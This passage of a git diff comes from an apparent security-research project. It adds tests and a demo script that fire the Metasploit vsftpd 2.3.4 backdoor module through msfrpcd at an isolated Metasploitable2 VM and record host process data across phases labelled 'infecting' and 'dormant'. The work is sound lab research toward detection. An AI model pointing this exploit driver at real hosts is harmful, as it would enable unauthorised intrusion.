driver.set_phase("infected_running") + driver.set_phase("dormant") + # No shell writes should have happened. 
+ assert client.shell_writes == [] + + +def test_arm_is_idempotent() -> None: + driver, client, events = _make_driver( + sessions_after_fire={1: {"type": "shell"}}, + ) + driver.setup() + driver.set_phase("armed") + driver.set_phase("armed") + fire_calls = [c for c in client.calls if c[0] == "module_execute"] + assert len(fire_calls) == 1 + + +def test_teardown_kills_session_and_logs_out() -> None: + driver, client, events = _make_driver( + sessions_after_fire={1: {"type": "shell"}}, + ) + driver.setup() + driver.set_phase("armed") + driver.set_phase("infecting") + driver.teardown() + assert any(c[0] == "session_stop" for c in client.calls) + assert client.logged_in is False + assert any(e[0] == "session_killed" for e in events) + + +# ----------------------------------------------------------------------- +# Driver wired into a real EpisodeRunner — events land in events.jsonl +# ----------------------------------------------------------------------- + +def test_driver_events_persist_to_events_jsonl(tmp_path: Path) -> None: + """When the driver is connected to a real EpisodeRunner, the + events it emits must show up in the episode's events.jsonl with + monotonic-clock timestamps (so labels and exploit events can be + correlated downstream).""" + import os + + from orchestrator.episode import EpisodeConfig, EpisodeRunner + + cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml") + client = FakeMSFRpcClient( + sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}}, + ) + + schedule = [ + ("clean", 0.05), + ("armed", 0.05), + ("infecting", 0.05), + ("infected_running", 0.05), + ("dormant", 0.05), + ("clean", 0.05), + ] + ec = EpisodeConfig( + target_pid=os.getpid(), + duration_s=sum(d for _, d in schedule), + interval_ms=20, + data_root=tmp_path, + phase_schedule=schedule, + ) + runner = EpisodeRunner(ec) + driver = MSFExploitDriver( + client=client, # type: ignore[arg-type] + module=cfg, + cfg=DriverConfig(target_ip="10.200.0.10", 
session_open_timeout_s=0.5), + emit_event=runner.emit_event, + ) + runner.on_phase = driver.set_phase + driver.setup() + try: + result = runner.run() + finally: + driver.teardown() + + events = [ + json.loads(l) + for l in (result.episode_dir / "events.jsonl").read_text().splitlines() + ] + names = [e["event"] for e in events] + assert "snapshot_load" in names + assert "driver_setup" in names + assert "exploit_fire" in names + assert "session_open" in names + assert "sample_executed" in names + assert "session_dormant" in names + assert "episode_end" in names + + # Driver events must carry monotonic timestamps in episode-relative + # order (snapshot_load is essentially at origin, exploit_fire later, + # session_open later still, episode_end last). + by_name = {e["event"]: e for e in events} + assert by_name["snapshot_load"]["t_mono_ns"] < 1_000_000 # <1ms after origin + assert by_name["exploit_fire"]["t_mono_ns"] > by_name["snapshot_load"]["t_mono_ns"] + assert by_name["session_open"]["t_mono_ns"] >= by_name["exploit_fire"]["t_mono_ns"] + assert by_name["episode_end"]["t_mono_ns"] >= by_name["session_open"]["t_mono_ns"] diff --git a/tools/run_tier3_demo.py b/tools/run_tier3_demo.py new file mode 100644 index 0000000..ed5e15c --- /dev/null +++ b/tools/run_tier3_demo.py @@ -0,0 +1,241 @@ +"""Tier-3: real VM, real exploit, honest ``armed -> infecting`` transition. + +Boots the vulnerable target VM, drives an msfrpcd-fired exploit module +against it, and lets the orchestrator's host /proc collector sample +the qemu-system pid throughout. Compared to ``run_real_vm_demo.py``: +the workload that crosses the ``armed -> infecting`` boundary is now +generated by an actual exploit landing a session, not by a script in +the guest. + +Prereqs: + - vm/images/.qcow2 (e.g. 
Metasploitable2) + - msfrpcd running locally: + msfrpcd -P -U msf -a 127.0.0.1 -p 55553 + - ``msgpack`` python package installed (added to runtime deps) + +Run: + MSFRPC_PASSWORD= uv run python tools/run_tier3_demo.py \\ + --module vsftpd_234_backdoor \\ + --data-root data +""" + +from __future__ import annotations + +import argparse +import logging +import os +import signal +import subprocess +import sys +import time +from pathlib import Path + +# Allow running as a script. +sys.path.insert(0, str(Path(__file__).resolve().parent.parent)) + +from exploits.driver import DriverConfig, MSFExploitDriver # noqa: E402 +from exploits.modules import load_module_config # noqa: E402 +from exploits.msfrpc import MSFRpcClient, MSFRpcConfig # noqa: E402 +from orchestrator.episode import EpisodeConfig, EpisodeRunner # noqa: E402 + + +# Same envelope shape as Tier 2 so plots are comparable. Slightly more +# armed/infecting time because real exploit fire + session establishment +# takes hundreds of ms to a few seconds. 
+DEFAULT_SCHEDULE = [ + ("clean", 10.0), + ("armed", 3.0), + ("infecting", 5.0), + ("infected_running", 25.0), + ("dormant", 15.0), + ("infected_running", 20.0), + ("dormant", 5.0), + ("clean", 5.0), +] + + +def _wait_for_path(path: Path, timeout_s: float) -> None: + deadline = time.monotonic() + timeout_s + while time.monotonic() < deadline: + if path.exists() and path.read_text().strip(): + return + time.sleep(0.2) + raise TimeoutError(f"{path} never appeared within {timeout_s}s") + + +def _wait_for_tcp(host: str, port: int, timeout_s: float) -> None: + import socket + deadline = time.monotonic() + timeout_s + last_err: Exception | None = None + while time.monotonic() < deadline: + try: + with socket.create_connection((host, port), timeout=1.0): + return + except OSError as e: + last_err = e + time.sleep(1.0) + raise TimeoutError( + f"target service {host}:{port} not reachable within {timeout_s}s " + f"(last: {last_err})" + ) + + +def main() -> int: + parser = argparse.ArgumentParser(prog="run_tier3_demo") + parser.add_argument("--data-root", default="data") + parser.add_argument("--interval-ms", type=int, default=100) + parser.add_argument( + "--module", + default="vsftpd_234_backdoor", + help="Module config name in exploits/modules/.toml", + ) + parser.add_argument( + "--target-ip", + default="127.0.0.1", + help="Address the exploit module sets RHOSTS to. 
With the SLIRP " + "launcher (default), the guest's vulnerable port is hostfwd'd to " + "loopback; on a host-only bridge, this is the guest's bridge IP.", + ) + parser.add_argument( + "--target-port", + type=int, + default=21, + help="Probe port to wait on before firing the exploit", + ) + parser.add_argument( + "--run-dir", + default="/tmp/cis490-target", + help="QEMU run dir (sockets + pidfile)", + ) + parser.add_argument( + "--msfrpc-host", default=os.environ.get("MSFRPC_HOST", "127.0.0.1"), + ) + parser.add_argument( + "--msfrpc-port", type=int, + default=int(os.environ.get("MSFRPC_PORT", "55553")), + ) + parser.add_argument( + "--msfrpc-user", default=os.environ.get("MSFRPC_USER", "msf"), + ) + parser.add_argument( + "--keep-vm", + action="store_true", + help="leave the VM running after the episode finishes", + ) + parser.add_argument( + "--target-boot-timeout", + type=float, + default=180.0, + help="how long to wait for the guest's vulnerable service to listen", + ) + args = parser.parse_args() + + logging.basicConfig( + level=logging.INFO, + format="%(asctime)s %(levelname)s %(name)s %(message)s", + ) + log = logging.getLogger("cis490.run_tier3_demo") + + msfrpc_password = os.environ.get("MSFRPC_PASSWORD") + if not msfrpc_password: + log.error("MSFRPC_PASSWORD env var must be set") + return 2 + + repo_root = Path(__file__).resolve().parent.parent + launcher = repo_root / "vm" / "launch_target.sh" + modules_dir = repo_root / "exploits" / "modules" + module_path = modules_dir / f"{args.module}.toml" + if not module_path.exists(): + log.error("no module config at %s", module_path) + return 2 + + module = load_module_config(module_path) + log.info("module loaded: %s (%s)", module.name, module.module_path) + + run_dir = Path(args.run_dir) + if run_dir.exists(): + import shutil + shutil.rmtree(run_dir) + run_dir.mkdir(parents=True, exist_ok=True) + pid_file = run_dir / "qemu.pid" + + log.info("booting target VM via %s (RUN_DIR=%s)", launcher, run_dir) + env = 
os.environ.copy() + env["RUN_DIR"] = str(run_dir) + qemu = subprocess.Popen( + [str(launcher)], + cwd=str(repo_root), + env=env, + stdout=subprocess.DEVNULL, + stderr=subprocess.DEVNULL, + start_new_session=True, + ) + + try: + _wait_for_path(pid_file, timeout_s=15.0) + qemu_pid = int(pid_file.read_text().strip()) + log.info("qemu pid = %d; waiting for service on %s:%d (timeout %.0fs)", + qemu_pid, args.target_ip, args.target_port, + args.target_boot_timeout) + _wait_for_tcp(args.target_ip, args.target_port, args.target_boot_timeout) + log.info("target service is up") + + client = MSFRpcClient( + MSFRpcConfig( + host=args.msfrpc_host, + port=args.msfrpc_port, + user=args.msfrpc_user, + password=msfrpc_password, + ) + ) + + cfg = EpisodeConfig( + target_pid=qemu_pid, + duration_s=sum(d for _, d in DEFAULT_SCHEDULE), + interval_ms=args.interval_ms, + data_root=Path(args.data_root), + phase_schedule=DEFAULT_SCHEDULE, + image_name=module.name + "-target", + snapshot_name="qcow2-snapshot-on", + ) + runner = EpisodeRunner(cfg) + + driver = MSFExploitDriver( + client=client, + module=module, + cfg=DriverConfig(target_ip=args.target_ip), + emit_event=runner.emit_event, + ) + runner.on_phase = driver.set_phase + + driver.setup() + try: + result = runner.run() + finally: + driver.teardown() + + print() + print(f"episode_id = {result.episode_id}") + print(f"path = {result.episode_dir}") + print(f"rows_proc = {result.rows_proc}") + print(f"phases = {result.phases_observed}") + print(f"module = {module.module_path}") + print() + print("To plot:") + print(f" uv run python tools/plot_envelope.py {result.episode_dir}") + return 0 + finally: + if not args.keep_vm: + log.info("shutting down VM (pid=%d)", qemu.pid) + try: + os.killpg(os.getpgid(qemu.pid), signal.SIGTERM) + except ProcessLookupError: + pass + try: + qemu.wait(timeout=5) + except subprocess.TimeoutExpired: + os.killpg(os.getpgid(qemu.pid), signal.SIGKILL) + + +if __name__ == "__main__": + sys.exit(main()) diff --git 
a/vm/launch_target.sh b/vm/launch_target.sh new file mode 100755 index 0000000..8d3cae3 --- /dev/null +++ b/vm/launch_target.sh @@ -0,0 +1,95 @@ +#!/usr/bin/env bash +# Boot the Tier-3 *target* VM (the intentionally-vulnerable guest the +# exploit fires against). Companion to ``launch_demo.sh``, which boots +# the *idle* Alpine guest used in Tiers 1-2. +# +# Networking note: this launcher uses SLIRP usermode networking with +# ``restrict=on`` plus an explicit ``hostfwd`` for each vulnerable port. +# That gives us: +# - the host can reach the guest's services (for msfrpcd + the +# exploit module to drive ``RHOSTS=127.0.0.1``) +# - the guest cannot reach the host or the internet (no NAT exit) +# +# The host-only ``br-malware`` bridge described in docs/architecture.md +# replaces SLIRP once the bridge-side pcap collector (source 4) lands — +# at which point payloads with ``reverse_tcp`` callbacks become viable +# too. Until then, we restrict module choices to ones that return a +# shell on the same socket they exploit (e.g. vsftpd_234_backdoor). +# +# Run-dir contract (read by run_tier3_demo.py): +# $RUN_DIR/qemu.pid +# $RUN_DIR/qmp.sock +# $RUN_DIR/monitor.sock +# $RUN_DIR/serial.sock + +set -euo pipefail + +REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)" +IMAGE="${IMAGE:-$REPO_ROOT/vm/images/metasploitable2.qcow2}" +RUN_DIR="${RUN_DIR:-/tmp/cis490-target}" +RAM_MIB="${RAM_MIB:-512}" +# Ports the host should forward to the guest. Comma-separated host:guest pairs. +# Default covers the vsftpd module's RPORT. +TARGET_PORTS="${TARGET_PORTS:-21:21}" +# KVM if the host can take it; otherwise fall back to TCG. Cross-arch +# images (Metasploitable2 is x86-only) on aarch64 hosts will need TCG. +ACCEL="${ACCEL:-}" + +mkdir -p "$RUN_DIR" +QMP_SOCK="$RUN_DIR/qmp.sock" +MON_SOCK="$RUN_DIR/monitor.sock" +PID_FILE="$RUN_DIR/qemu.pid" +SERIAL_SOCK="$RUN_DIR/serial.sock" + +if [[ ! -f "$IMAGE" ]]; then + cat >&2 <